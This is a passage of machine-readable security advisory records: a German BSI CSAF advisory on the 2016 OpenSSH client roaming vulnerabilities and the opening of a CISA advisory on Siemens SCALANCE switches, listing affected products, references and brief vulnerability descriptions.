Advisory\"]},{\"url\":\"http://www.debian.org/security/2016/dsa-3446\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"http://www.openssh.com/txt/release-7.1p2\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\",\"Release Notes\",\"Vendor Advisory\"]},{\"url\":\"http://www.openwall.com/lists/oss-security/2016/01/14/7\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Mailing List\",\"Technical Description\",\"Third Party Advisory\"]},{\"url\":\"http://www.oracle.com/technetwork/topics/security/bulletinoct2015-2511968.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"http://www.securityfocus.com/archive/1/537295/100/0/threaded\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://www.securityfocus.com/bid/80698\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://www.securitytracker.com/id/1034671\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://www.ubuntu.com/usn/USN-2869-1\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Release Notes\",\"Vendor Advisory\"]},{\"url\":\"https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Release Notes\",\"Vendor Advisory\"]},{\"url\":\"https://bto.bluecoat.com/security-advisory/sa109\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05247375\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05356388\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05385680\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05390722\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://security.gentoo.org/glsa/201601-01\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://support.apple.com/HT206167\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Vendor Advisory\"]}]}}" } }
wid-sec-w-2024-1055
Vulnerability from csaf_certbund
Notes
{ "document": { "aggregate_severity": { "text": "mittel" }, "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "de-DE", "notes": [ { "category": "legal_disclaimer", "text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen." }, { "category": "description", "text": "OpenSSH ist eine Open Source Implementierung des Secure Shell Protokolls.\r\nUbuntu Linux ist die Linux Distribution des Herstellers Canonical.\r\nRed Hat Enterprise Linux Desktop ist eine Linux-Distribution der Firma Red Hat.\r\nRed Hat Enterprise Linux HPC Node ist eine Linux-Distribution der Firma Red Hat.\r\nRed Hat Enterprise Linux Server ist eine Linux-Distribution der Firma Red Hat.\r\nRed Hat Enterprise Linux Workstation ist eine Linux-Distribution der Firma Red Hat.\r\nDebian ist eine Linux-Distribution, die ausschlie\u00dflich Freie Software enth\u00e4lt.\r\nSUSE Linux Enterprise Server ist eine Linux-Distribution bzw. Open Source Plattform.\r\nSUSE Linux Enterprise Desktop ist eine Linux-Distribution bzw. Open Source Plattform.", "title": "Produktbeschreibung" }, { "category": "summary", "text": "Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in OpenSSH, Ubuntu Linux, Red Hat Enterprise Linux Desktop, Red Hat Enterprise Linux HPC Node, Red Hat Enterprise Linux Server, Red Hat Enterprise Linux Workstation, Debian Linux, SUSE SUSE Linux Enterprise Server und SUSE SUSE Linux Enterprise Desktop ausnutzen, um Informationen offenzulegen und um einen Denial of Service Zustand herbeizuf\u00fchren.", "title": "Angriff" }, { "category": "general", "text": "- Juniper Appliance\n- Linux\n- UNIX", "title": "Betroffene Betriebssysteme" } ], "publisher": { "category": "other", "contact_details": "csaf-provider@cert-bund.de", "name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik", "namespace": "https://www.bsi.bund.de" }, "references": [ { "category": "self", "summary": "WID-SEC-W-2024-1055 - CSAF Version", "url": "https://wid.cert-bund.de/.well-known/csaf/white/2016/wid-sec-w-2024-1055.json" }, { "category": "self", "summary": "WID-SEC-2024-1055 - Portal Version", "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2024-1055" }, { "category": "external", "summary": "SuSE Advisory vom 2016-01-14", "url": "https://download.suse.com/patch/finder/?keywords=46a0cbd9ae5ee725ff8506b8230a41f9" }, { "category": "external", "summary": "SuSE Advisory vom 2016-01-14", "url": "https://download.suse.com/patch/finder/?keywords=46a0cbd9ae5ee725ff8506b8230a41f9" }, { "category": "external", "summary": "Qualys Security Advisory Roaming through the OpenSSH client: CVE-2016-0777 and CVE-2016-0778 vom 2016-01-14", "url": "https://www.qualys.com/2016/01/14/cve-2016-0777-cve-2016-0778/openssh-cve-2016-0777-cve-2016-0778.txt" }, { "category": "external", "summary": "Ubuntu Security Notice USN-2869-1 vom 2016-01-14", "url": "http://www.ubuntu.com/usn/usn-2869-1/" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2016:0043-1 vom 2016-01-14", "url": "https://rhn.redhat.com/errata/RHSA-2016-0043.html" }, { "category": "external", "summary": "Debian Security Advisory DSA-3446-1 vom 2016-01-14", "url": "https://www.debian.org/security/2016/dsa-3446" }, { "category": "external", "summary": "OpenSSH 7.1p2 release vom 2016-01-14", "url": "http://www.openssh.com/txt/release-7.1p2" }, { "category": "external", "summary": "SUSE Security Update: Security update for openssh-openssl1 vom 2016-01-14", "url": "https://www.suse.com/support/update/announcement/2016/suse-su-20160117-1.html" }, { "category": "external", "summary": "SUSE Security Update: Security update for openssh vom 2016-01-14", "url": "https://www.suse.com/support/update/announcement/2016/suse-su-20160118-1.html" }, { "category": "external", "summary": "SUSE Security Update: Security update for openssh vom 2016-01-14", "url": "https://www.suse.com/support/update/announcement/2016/suse-su-20160119-1.html" }, { "category": "external", "summary": "SUSE Security Update: Security update for openssh vom 2016-01-14", "url": "https://www.suse.com/support/update/announcement/2016/suse-su-20160120-1.html" }, { "category": "external", "summary": "SUSE Security Update SUSE-SU-2016:0117-1 vom 2016-01-18", "url": "https://www.suse.com/support/update/announcement/2016/suse-su-20160117-1.html" }, { "category": "external", "summary": "SUSE Security Update SUSE-SU-2016:0118-1 vom 2016-01-18", "url": "https://www.suse.com/support/update/announcement/2016/suse-su-20160118-1.html" }, { "category": "external", "summary": "SUSE Security Update SUSE-SU-2016:0120-1 vom 2016-01-18", "url": "https://www.suse.com/support/update/announcement/2016/suse-su-20160120-1.html" }, { "category": "external", "summary": "SUSE Security Update SUSE-SU-2016:0119-1 vom 2016-01-18", "url": "https://www.suse.com/support/update/announcement/2016/suse-su-20160119-1.html" }, { "category": "external", "summary": "GENTOO Security Advisory GLSA201601-01 vom 2016-01-18", "url": "https://security.gentoo.org/glsa/201601-01" }, { "category": "external", "summary": "Sophos Advisory Article ID: 123533", "url": "https://community.sophos.com/kb/en-US/123533" }, { "category": "external", "summary": "BLUECOAT Security Advisory SA109 vom 2016-01-28", "url": "https://bto.bluecoat.com/security-advisory/sa109" }, { "category": "external", "summary": "IBM Security Advisory openssh_advisory7 vom 2016-01-29", "url": "http://aix.software.ibm.com/aix/efixes/security/openssh_advisory7.asc" }, { "category": "external", "summary": "Juniper Security Bulletin JSA10734 vom 2016-04-13", "url": "http://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10734" }, { "category": "external", "summary": "Ubuntu Security Notice USN-2966-1 vom 2016-05-10", "url": "http://www.ubuntu.com/usn/usn-2966-1/" }, { "category": "external", "summary": "NetBSD 7.0.1 Release", "url": "http://www.netbsd.org/releases/formal-7/NetBSD-7.0.1.html" }, { "category": "external", "summary": "Xerox Security Mini Bulletin XRX16AD vom 2016-10-17", "url": "https://www.xerox.com/download/security/security-bulletin/1c689-53f9d654b80cf/cert_Security_Mini-_Bulletin_XRX16AD_for_WC57xx_v1-0.pdf" }, { "category": "external", "summary": "Juniper Security Advisory JSA10774 vom 2017-01-12", "url": "https://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10774" }, { "category": "external", "summary": "Dell Security Advisory DSA-2024-198 vom 2024-05-08", "url": "https://www.dell.com/support/kbdoc/000224827/dsa-2024-=" } ], "source_lang": "en-US", "title": "OpenSSH: Mehrere Schwachstellen", "tracking": { "current_release_date": "2024-05-13T22:00:00.000+00:00", "generator": { "date": "2024-08-15T18:08:38.029+00:00", "engine": { "name": "BSI-WID", "version": "1.3.5" } }, "id": "WID-SEC-W-2024-1055", "initial_release_date": "2016-01-14T23:00:00.000+00:00", "revision_history": [ { "date": "2016-01-14T23:00:00.000+00:00", "number": "1", "summary": "Initial Release" }, { "date": "2016-01-14T23:00:00.000+00:00", "number": "2", "summary": "Version nicht vorhanden" }, { "date": "2016-01-17T23:00:00.000+00:00", "number": "3", "summary": "New remediations available" }, { "date": "2016-01-17T23:00:00.000+00:00", "number": "4", "summary": "Version nicht vorhanden" }, { "date": "2016-01-17T23:00:00.000+00:00", "number": "5", "summary": "New remediations available" }, { "date": "2016-01-18T23:00:00.000+00:00", "number": "6", "summary": "New remediations available" }, { "date": "2016-01-18T23:00:00.000+00:00", "number": "7", "summary": "Version nicht vorhanden" }, { "date": "2016-01-18T23:00:00.000+00:00", "number": "8", "summary": "Version nicht vorhanden" }, { "date": "2016-01-21T23:00:00.000+00:00", "number": "9", "summary": "New remediations available" }, { "date": "2016-01-21T23:00:00.000+00:00", "number": "10", "summary": "Version nicht vorhanden" }, { "date": "2016-01-27T23:00:00.000+00:00", "number": "11", "summary": "New remediations available" }, { "date": "2016-02-03T23:00:00.000+00:00", "number": "12", "summary": "New remediations available" }, { "date": "2016-02-03T23:00:00.000+00:00", "number": "13", "summary": "Version nicht vorhanden" }, { "date": "2016-04-13T22:00:00.000+00:00", "number": "14", "summary": "New remediations available" }, { "date": "2016-04-13T22:00:00.000+00:00", "number": "15", "summary": "Version nicht vorhanden" }, { "date": "2016-05-09T22:00:00.000+00:00", "number": "16", "summary": "New remediations available" }, { "date": "2016-05-30T22:00:00.000+00:00", "number": "17", "summary": "New remediations available" }, { "date": "2016-05-30T22:00:00.000+00:00", "number": "18", "summary": "Version nicht vorhanden" }, { "date": "2016-10-24T22:00:00.000+00:00", "number": "19", "summary": "New remediations available" }, { "date": "2016-10-24T22:00:00.000+00:00", "number": "20", "summary": "Version nicht vorhanden" }, { "date": "2017-01-11T23:00:00.000+00:00", "number": "21", "summary": "New remediations available" }, { "date": "2017-01-11T23:00:00.000+00:00", "number": "22", "summary": "Version nicht vorhanden" }, { "date": "2017-01-11T23:00:00.000+00:00", "number": "23", "summary": "Version nicht vorhanden" }, { "date": "2018-08-23T22:00:00.000+00:00", "number": "24", "summary": "Added references" }, { "date": "2024-05-07T22:00:00.000+00:00", "number": "25", "summary": "Neue Updates von Dell aufgenommen" }, { "date": "2024-05-12T22:00:00.000+00:00", "number": "26", "summary": "Korrektur" }, { "date": "2024-05-13T22:00:00.000+00:00", "number": "27", "summary": "Doppelte Eintragung korrigiert" } ], "status": "final", "version": "27" } }, "product_tree": { "branches": [ { "branches": [ { "category": "product_name", "name": "Debian Linux", "product": { "name": "Debian Linux", "product_id": "2951", "product_identification_helper": { "cpe": "cpe:/o:debian:debian_linux:-" } } } ], "category": "vendor", "name": "Debian" }, { "branches": [ { "branches": [ { "category": "product_version", "name": "virtual", "product": { "name": "Dell NetWorker virtual", "product_id": "T034583", "product_identification_helper": { "cpe": "cpe:/a:dell:networker:virtual" } } } ], "category": "product_name", "name": "NetWorker" } ], "category": "vendor", "name": "Dell" }, { "branches": [ { "category": "product_name", "name": "EMC Avamar", "product": { "name": "EMC Avamar", "product_id": "T014381", "product_identification_helper": { "cpe": "cpe:/a:emc:avamar:-" } } } ], "category": "vendor", "name": "EMC" }, { "branches": [ { "branches": [ { "category": "product_version", "name": "7.1", "product": { "name": "IBM AIX 7.1", "product_id": "153340", "product_identification_helper": { "cpe": "cpe:/o:ibm:aix:7.1" } } }, { "category": "product_version", "name": "5.3", "product": { "name": "IBM AIX 5.3", "product_id": "30418", "product_identification_helper": { "cpe": "cpe:/o:ibm:aix:5.3" } } }, { "category": "product_version", "name": "6.1", "product": { "name": "IBM AIX 6.1", "product_id": "73182", "product_identification_helper": { "cpe": "cpe:/o:ibm:aix:6.1" } } }, { "category": "product_version", "name": "7.2", "product": { "name": "IBM AIX 7.2", "product_id": "T006613", "product_identification_helper": { "cpe": "cpe:/o:ibm:aix:7.2" } } } ], "category": "product_name", "name": "AIX" }, { "branches": [ { "category": "product_version", "name": "2.2.x", "product": { "name": "IBM VIOS 2.2.x", "product_id": "T002859", "product_identification_helper": { "cpe": "cpe:/a:ibm:vios:2.2" } } } ], "category": "product_name", "name": "VIOS" } ], "category": "vendor", "name": "IBM" }, { "branches": [ { "category": "product_name", "name": "Juniper JUNOS", "product": { "name": "Juniper JUNOS", "product_id": "5930", "product_identification_helper": { "cpe": "cpe:/o:juniper:junos:-" } } } ], "category": "vendor", "name": "Juniper" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "\u003c7.0.1", "product": { "name": "NetBSD Foundation NetBSD OS \u003c7.0.1", "product_id": "T007683" } } ], "category": "product_name", "name": "NetBSD OS" } ], "category": "vendor", "name": "NetBSD Foundation" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "\u003e=5.4", "product": { "name": "Open Source OpenSSH \u003e=5.4", "product_id": "159813" } }, { "category": "product_version_range", "name": "\u003e=6.8", "product": { "name": "Open Source OpenSSH \u003e=6.8", "product_id": "313791" } }, { "category": "product_version_range", "name": "\u003c7.1p2", "product": { "name": "Open Source OpenSSH \u003c7.1p2", "product_id": "T006799" } } ], "category": "product_name", "name": "OpenSSH" } ], "category": "vendor", "name": "Open Source" }, { "branches": [ { "branches": [ { "category": "product_version", "name": "v.7", "product": { "name": "Red Hat Enterprise Linux Server v.7", "product_id": "270581", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:7.0" } } } ], "category": "product_name", "name": "Enterprise Linux" }, { "branches": [ { "category": "product_version", "name": "v.7", "product": { "name": "Red Hat Enterprise Linux Desktop v.7", "product_id": "T003548", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux_desktop:7" } } } ], "category": "product_name", "name": "Enterprise Linux Desktop" }, { "branches": [ { "category": "product_version", "name": "v.7", "product": { "name": "Red Hat Enterprise Linux HPC Node v.7", "product_id": "T003549", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux_hpc_node:7" } } } ], "category": "product_name", "name": "Enterprise Linux HPC Node" }, { "branches": [ { "category": "product_version", "name": "v.7", "product": { "name": "Red Hat Enterprise Linux Workstation v.7", "product_id": "T003565", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux_workstation:7" } } } ], "category": "product_name", "name": "Enterprise Linux Workstation" } ], "category": "vendor", "name": "Red Hat" }, { "branches": [ { "branches": [ { "category": "product_version", "name": "11-SP3", "product": { "name": "SUSE Linux Enterprise Desktop 11-SP3", "product_id": "T002224", "product_identification_helper": { "cpe": "cpe:/o:suse:linux_enterprise_desktop:11:sp3" } } }, { "category": "product_version", "name": "12", "product": { "name": "SUSE Linux Enterprise Desktop 12", "product_id": "T003855", "product_identification_helper": { "cpe": "cpe:/o:suse:linux_enterprise_desktop:12" } } }, { "category": "product_version", "name": "11-SP4", "product": { "name": "SUSE Linux Enterprise Desktop 11-SP4", "product_id": "T006230", "product_identification_helper": { "cpe": "cpe:/o:suse:linux_enterprise_desktop:11:sp4" } } }, { "category": "product_version", "name": "12-SP1", "product": { "name": "SUSE Linux Enterprise Desktop 12-SP1", "product_id": "T006804", "product_identification_helper": { "cpe": "cpe:/o:suse:linux_enterprise_desktop:12:sp1" } } } ], "category": "product_name", "name": "Linux Enterprise Desktop" }, { "branches": [ { "category": "product_version", "name": "11-SP3", "product": { "name": "SUSE Linux Enterprise Server 11-SP3", "product_id": "T002223", "product_identification_helper": { "cpe": "cpe:/o:suse:linux_enterprise_server:11:sp3" } } }, { "category": "product_version", "name": "11-SP3 for VMWare", "product": { "name": "SUSE Linux Enterprise Server 11-SP3 for VMWare", "product_id": "T003319", "product_identification_helper": { "cpe": "cpe:/o:suse:linux_enterprise_server:11_sp3_for_vmware" } } }, { "category": "product_version", "name": "11", "product": { "name": "SUSE Linux Enterprise Server 11", "product_id": "T005157", "product_identification_helper": { "cpe": "cpe:/o:suse:linux_enterprise_server:11" } } }, { "category": "product_version", "name": "11-SP4", "product": { "name": "SUSE Linux Enterprise Server 11-SP4", "product_id": "T005583", "product_identification_helper": { "cpe": "cpe:/o:suse:linux_enterprise_server:11-sp4" } } }, { "category": "product_version", "name": "12", "product": { "name": "SUSE Linux Enterprise Server 12", "product_id": "T005898", "product_identification_helper": { "cpe": "cpe:/o:suse:linux_enterprise_server:12" } } }, { "category": "product_version", "name": "12-SP1", "product": { "name": "SUSE Linux Enterprise Server 12-SP1", "product_id": "T006803", "product_identification_helper": { "cpe": "cpe:/o:suse:linux_enterprise_server:12:sp1" } } } ], "category": "product_name", "name": "Linux Enterprise Server" } ], "category": "vendor", "name": "SUSE" }, { "branches": [ { "category": "product_name", "name": "Sophos Unified Threat Management (UTM) Software", "product": { "name": "Sophos Unified Threat Management (UTM) Software", "product_id": "T006910", "product_identification_helper": { "cpe": "cpe:/a:sophos:unified_threat_management_software:-" } } } ], "category": "vendor", "name": "Sophos" }, { "branches": [ { "branches": [ { "category": "product_version", "name": "12.04 LTS", "product": { "name": "Ubuntu Linux 12.04 LTS", "product_id": "307702", "product_identification_helper": { "cpe": "cpe:/o:canonical:ubuntu_linux:12.04::~~lts~~~" } } }, { "category": "product_version", "name": "14.04 LTS", "product": { "name": "Ubuntu Linux 14.04 LTS", "product_id": "308878", "product_identification_helper": { "cpe": "cpe:/o:canonical:ubuntu_linux:14.04::~~lts~~~" } } }, { "category": "product_version", "name": "15.04", "product": { "name": "Ubuntu Linux 15.04", "product_id": "310566", "product_identification_helper": { "cpe": "cpe:/o:canonical:ubuntu_linux:15.04" } } }, { "category": "product_version", "name": "15.1", "product": { "name": "Ubuntu Linux 15.10", "product_id": "316506", "product_identification_helper": { "cpe": "cpe:/o:canonical:ubuntu_linux:15.10" } } } ], "category": "product_name", "name": "Linux" } ], "category": "vendor", "name": "Ubuntu" }, { "branches": [ { "branches": [ { "category": "product_version", "name": "5740", "product": { "name": "Xerox WorkCentre 5740", "product_id": "T003192", "product_identification_helper": { "cpe": "cpe:/h:xerox:workcentre:5740" } } }, { "category": "product_version", "name": "5745", "product": { "name": "Xerox WorkCentre 5745", "product_id": "T003193", "product_identification_helper": { "cpe": "cpe:/h:xerox:workcentre:5745" } } }, { "category": "product_version", "name": "5755", "product": { "name": "Xerox WorkCentre 5755", "product_id": "T003194", "product_identification_helper": { "cpe": "cpe:/h:xerox:workcentre:5755" } } }, { "category": "product_version", "name": "5765", "product": { "name": "Xerox WorkCentre 5765", "product_id": "T003195", "product_identification_helper": { "cpe": "cpe:/h:xerox:workcentre:5765" } } }, { "category": "product_version", "name": "5775", "product": { "name": "Xerox WorkCentre 5775", "product_id": "T003196", "product_identification_helper": { "cpe": "cpe:/h:xerox:workcentre:5775" } } }, { "category": "product_version", "name": "5790", "product": { "name": "Xerox WorkCentre 5790", "product_id": "T003197", "product_identification_helper": { "cpe": "cpe:/h:xerox:workcentre:5790" } } }, { "category": "product_version", "name": "5735", "product": { "name": "Xerox WorkCentre 5735", "product_id": "T008752", "product_identification_helper": { "cpe": "cpe:/h:xerox:workcentre:5735" } } } ], "category": "product_name", "name": "WorkCentre" } ], "category": "vendor", "name": "Xerox" } ] }, "vulnerabilities": [ { "cve": "CVE-2016-0777", "notes": [ { "category": "description", "text": "Es existiert eine Schwachstelle in OpenSSH im Zusammenhang mit einer experimentiellen Funktionalit\u00e4t (roaming) des OpenSSH-Clients. Ein anonymer, entfernter Angreifer kann diese Schwachstelle ausnutzen, um Daten aus dem Speicher durch den Sendepuffer auszulesen. Zur erfolgreichen Ausnutzung dieser Schwachstelle muss der Angreifer den Benutzer dazu bringen sich an einem Server unter seiner Kontrolle zu verbinden." } ], "product_status": { "known_affected": [ "T003565", "T006613", "T006910", "T034583", "T003548", "T003549", "T002859", "73182", "5930", "T006230", "T005583", "153340", "T005157", "T005898", "T006803", "T003855", "T006804", "T003319", "270581", "316506", "310566", "T014381", "2951", "T002224", "T002223", "307702", "30418", "308878" ] }, "release_date": "2016-01-14T23:00:00.000+00:00", "title": "CVE-2016-0777" }, { "cve": "CVE-2016-0778", "notes": [ { "category": "description", "text": "Es existiert eine Schwachstelle in OpenSSH im Zusammenhang mit dem Filedeskriptor und Roaming. Ein anonymer, entfernter Angreifer kann einen Speicher\u00fcberlauf am Heap in \"connection_out\" nach dem erneuten Aufbau der Verbindung erzwingen, um weitere Angriffe durchf\u00fchren zu k\u00f6nnen." } ], "product_status": { "known_affected": [ "T008752", "T003565", "T006613", "T006910", "T034583", "T003548", "T003549", "T002859", "73182", "5930", "T006230", "T005583", "153340", "T003197", "T005157", "T005898", "T006803", "T003855", "T006804", "T003319", "270581", "316506", "310566", "T014381", "2951", "T002224", "T002223", "307702", "30418", "T003192", "308878", "T003193", "T003194", "T003195", "T003196" ] }, "release_date": "2016-01-14T23:00:00.000+00:00", "title": "CVE-2016-0778" }, { "cve": "CVE-2016-1907", "notes": [ { "category": "description", "text": "Es existiert eine Denial of Service Schwachstelle in OpenSSH im Zusammenhang mit \"ssh_packet_restore_state()\" und Roaming. Ein anonymer, entfernter Angreifer kann diese Schwachstelle nutzen, um den OpenSSH-Client zum Absturz zu bringen. Das Problem besteht darin, dass beim erneuten Aufbau der Verbindung nicht der globale Pointer \"backup_state\" verwendet wird und dieser dann bei der Weitergabe an \"ssh_packet_restore_state()\" noch immer den Wert NULL hat." } ], "product_status": { "known_affected": [ "T005157", "T003565", "159813", "T005898", "T006803", "T034583", "T003855", "T003548", "T003549", "T006804", "T003319", "270581", "316506", "310566", "T014381", "2951", "T002224", "T002223", "307702", "308878", "T006230", "T005583" ] }, "release_date": "2016-01-14T23:00:00.000+00:00", "title": "CVE-2016-1907" } ] }
icsa-22-349-21
Vulnerability from csaf_cisa
Notes
{ "document": { "acknowledgments": [ { "organization": "Siemens", "summary": "reporting these vulnerabilities to CISA" } ], "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Disclosure is not limited", "tlp": { "label": "WHITE", "url": "https://us-cert.cisa.gov/tlp/" } }, "lang": "en-US", "notes": [ { "category": "general", "text": "This CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CISA CSAF: central@cisa.dhs.gov", "title": "CISA Disclaimer" }, { "category": "legal_disclaimer", "text": "All information products included in https://us-cert.cisa.gov/ics are provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained within. DHS does not endorse any commercial product or service, referenced in this product or otherwise. Further dissemination of this product is governed by the Traffic Light Protocol (TLP) marking in the header. For more information about TLP, see https://us-cert.cisa.gov/tlp/.", "title": "Legal Notice" }, { "category": "summary", "text": "Successful exploitation of these vulnerabilities could allow a denial-of-service condition or could lead to execution of arbitrary code.", "title": "Risk evaluation" }, { "category": "other", "text": " Multiple", "title": "Critical infrastructure sectors" }, { "category": "other", "text": " Worldwide", "title": "Countries/areas deployed" }, { "category": "other", "text": " Germany", "title": "Company headquarters location" }, { "category": "general", "text": "CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability these vulnerabilities. Specifically, users should:", "title": "Recommended Practices" }, { "category": "general", "text": "CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.", "title": "Recommended Practices" }, { "category": "general", "text": "CISA also provides a section for control systems security recommended practices on the ICS webpage at cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.", "title": "Recommended Practices" }, { "category": "general", "text": "Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.", "title": "Recommended Practices" }, { "category": "general", "text": "CISA also recommends users take the following measures to protect themselves from social engineering attacks:", "title": "Recommended Practices" }, { "category": "general", "text": "Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.", "title": "Recommended Practices" }, { "category": "general", "text": "For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories", "title": "Additional Resources" }, { "category": "other", "text": "These vulnerabilities are exploitable remotely. These vulnerabilities have a low attack complexity.", "title": "Exploitability" } ], "publisher": { "category": "coordinator", "contact_details": "Email: CISAservicedesk@cisa.dhs.gov;\n Toll Free: 1-888-282-0870", "name": "CISA", "namespace": "https://www.cisa.gov/" }, "references": [ { "category": "external", "summary": "SSA-412672: Multiple OpenSSL and OpenSSH Vulnerabilities in SCALANCE X-200RNA Switch Devices before V3.2.7 - CSAF Version", "url": "https://cert-portal.siemens.com/productcert/csaf/ssa-412672.json" }, { "category": "self", "summary": "ICS Advisory ICSA-22-349-21 JSON", "url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/OT/white/2022/icsa-22-349-21.json" }, { "category": "self", "summary": "ICS Advisory ICSA-22-349-21 Web Version", "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-22-349-21" }, { "category": "external", "summary": "Recommended Practices", "url": "https://www.cisa.gov/uscert/ncas/tips/ST04-014" }, { "category": "external", "summary": "Recommended Practices", "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" }, { "category": "external", "summary": "SSA-412672: Multiple OpenSSL and OpenSSH Vulnerabilities in SCALANCE X-200RNA Switch Devices before V3.2.7 - PDF Version", "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf" }, { "category": "external", "summary": "SSA-412672: Multiple OpenSSL and OpenSSH Vulnerabilities in SCALANCE X-200RNA Switch Devices before V3.2.7 - TXT Version", "url": "https://cert-portal.siemens.com/productcert/txt/ssa-412672.txt" } ], "title": "Siemens SCALANCE X-200RNA Switch Devices", "tracking": { "current_release_date": "2022-12-15T00:00:00.000000Z", "generator": { "engine": { "name": "CISA CSAF Generator", "version": "1.0.0" } }, "id": "ICSA-22-349-21", "initial_release_date": "2022-12-15T00:00:00.000000Z", "revision_history": [ { "date": "2022-12-15T00:00:00.000000Z", "legacy_version": "Initial", "number": "1", "summary": "Publication Date" } ], "status": "final", "version": "1" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "\u003c V3.2.7", "product": { "name": "SCALANCE X204RNA (HSR) (6GK5204-0BA00-2MB2)", "product_id": "CSAFPID-0001", "product_identification_helper": { "model_numbers": [ "6GK5204-0BA00-2MB2" ] } } } ], "category": "product_name", "name": "SCALANCE X204RNA (HSR) (6GK5204-0BA00-2MB2)" }, { "branches": [ { "category": "product_version_range", "name": "\u003c V3.2.7", "product": { "name": "SCALANCE X204RNA (PRP) (6GK5204-0BA00-2KB2)", "product_id": "CSAFPID-0002", "product_identification_helper": { "model_numbers": [ "6GK5204-0BA00-2KB2" ] } } } ], "category": "product_name", "name": "SCALANCE X204RNA (PRP) (6GK5204-0BA00-2KB2)" }, { "branches": [ { "category": "product_version_range", "name": "\u003c V3.2.7", "product": { "name": "SCALANCE X204RNA EEC (HSR) (6GK5204-0BS00-2NA3)", "product_id": "CSAFPID-0003", "product_identification_helper": { "model_numbers": [ "6GK5204-0BS00-2NA3" ] } } } ], "category": "product_name", "name": "SCALANCE X204RNA EEC (HSR) (6GK5204-0BS00-2NA3)" }, { "branches": [ { "category": "product_version_range", "name": "\u003c V3.2.7", "product": { "name": "SCALANCE X204RNA EEC (PRP) 